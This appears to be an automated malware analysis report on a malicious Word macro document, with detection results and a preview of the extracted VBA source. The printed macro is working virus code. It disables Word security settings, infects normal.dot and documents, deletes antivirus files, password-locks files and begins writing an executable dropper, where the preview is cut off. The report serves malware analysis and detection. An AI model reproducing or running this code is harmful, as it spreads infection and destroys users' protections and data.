Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db6966ec7fcc5af7…

MALICIOUS

Office (OLE)

45.5 KB Created: 1999-06-14 22:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: caa6e35a499f8895e16c4997b4a8fcce SHA-1: bfa9fefb4ccbb33ee0aaba22f907ffeecdbd2050 SHA-256: db6966ec7fcc5af722caefda3cbb485249b0aebd0c5fcf294fecfad04bb747f4
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros that attempt to disable security features and execute code. The presence of the 'Shell()' call in VBA and ClamAV detections for 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' strongly indicate malicious intent. The macro code also attempts to modify the 'normal.dot' template, suggesting an effort to establish persistence or spread.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12155 bytes
SHA-256: 50b4d48b9df86507b2d361e8f7bb6af244bbbaea38c39b13913a3f6b7b4cabf7
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BMVf"
Sub BMVf() '[B]MV.f Module Infection - [Strain F of the [B]MV series!]
On Error Resume Next

If Application.Version = 9# Then ' two lines below from W2000M/PSD - I'll give VicodinES the credit for this!
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    CommandBars("Macro").Controls("Security...").Enabled = False
End If

If Application.Version = 8# Then
    CommandBars("tools").Controls("Macro").Visible = False: CommandBars("tools").Controls("Customize...").Enabled = False: CommandBars("view").Controls("Toolbars").Enabled = False: CommandBars("view").Controls("Status Bar").Enabled = False
    Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Options.VirusProtection = False: Application.EnableCancelKey = wdCancelDisabled
End If

SetAttr "c:\program files\microsoft office\templates\normal.dot", vbNormal

ADInfected = False: NTInfected = False

For I = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(I).Name = "BMVf" _
        Then
            ADInfected = True
    End If
Next I

For j = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(j).Name = "BMVf" _
        Then
            NTInfected = True
            Application.Caption = "-=([B]MV.F)=-"
            Application.StatusBar = "-=([Bench] Macro Virus - Strain F)=-"
    End If
Next j

If ADInfected = False And NTInfected = False Then GoTo BMVf

If ADInfected = False Then
    NormalTemplate.VBProject.VBComponents("BMVf").Export "c:\system.sys"
    ActiveDocument.VBProject.VBComponents.Import "c:\system.sys"
    Kill "c:\system.sys"
End If

If NTInfected = False Then
    ActiveDocument.VBProject.VBComponents("BMVf").Export "c:\system.sys"
    NormalTemplate.VBProject.VBComponents.Import "c:\system.sys"
    Kill "c:\system.sys"
End If

BMVf:
If (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub FileSave()
On Error Resume Next
Kill "c:\program files\norton antivirus\Virscan2.dat"
Kill "c:\vdoc\*.*"
Kill "c:\f-prot\*.*"
'kill "C:\program files\antiviral toolkit pro\avp.key"
            Application.Caption = "-=([B]MV.F])=-"
            Application.StatusBar = "-=([B]MV.F)=- / SAiNTS ViRii Dept. - Test Version"
ActiveDocument.Save
End Sub
Sub ViewVBCode()
On Error Resume Next

Call BMVf

With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Heading = "[Bench] Macro Virus - F"
    .Text = "You're not permitted to go there! Now you're gonna pay!"
    .Animation = msoAnimationSearching
    .Show
End With

ActiveDocument.Password = "[Bench]"
ActiveDocument.Close Savechages:=wdSaveChanges

Kill "c:\program files\norton antivirus\Virscan2.dat"
Kill "c:\vdoc\*.*"
Kill "c:\f-prot\*.*"
' Kill "C:\program files\antiviral toolkit pro\*.*"
ActiveDocument.Save

Open "c:\TNN_CIH.SCR" For Output As #1
Print #1, "N TNN_CIH.COM"
Print #1, "E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00"
Print #1, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #1, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00"
Print #1, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #1, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F"
Print #1, "E 0160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20"
Print #1, "E 0170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00"
Print #1, "E 0180 50 45 00 00 4C 01 01 00 F1 68 20 35 00 00 00 00"
Print #1, "E 0190 00 00 00 00 E0 00 0F 01 0B 01 05 00 00 10 00 00"
Print #1, "E 01A0 00 00 00 00 00 00 00 00 10 10 00 00 00 10 00 00"
Print #1, "E 01B0 00 20 00 00
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.